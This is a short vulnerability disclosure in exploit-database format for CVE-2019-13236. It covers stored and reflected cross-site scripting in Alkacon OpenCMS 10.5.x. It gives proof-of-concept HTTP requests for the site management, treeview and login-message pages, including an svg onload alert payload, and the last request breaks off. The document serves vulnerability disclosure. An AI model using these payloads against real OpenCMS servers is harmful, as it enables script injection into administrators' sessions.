# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13236 1. In Site Management > New site (Stored XSS): - Affected resource title.0: POC: ``` POST /system/workplace/admin/sites/new.jsp HTTP/1.1 Host: example.com title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se ``` 2. In Treeview (Reflected XSS): - Affected resource type: POC: ``` http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type= &includefiles=true&showsiteselector=true&projectaware=false&treesite= ``` 3. In Workspace tools > Login message (Stored XSS): - Affected resource message.0: POC: ``` POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1 Host: example.com enabled.0=true&enabled.0.value=true&message.0=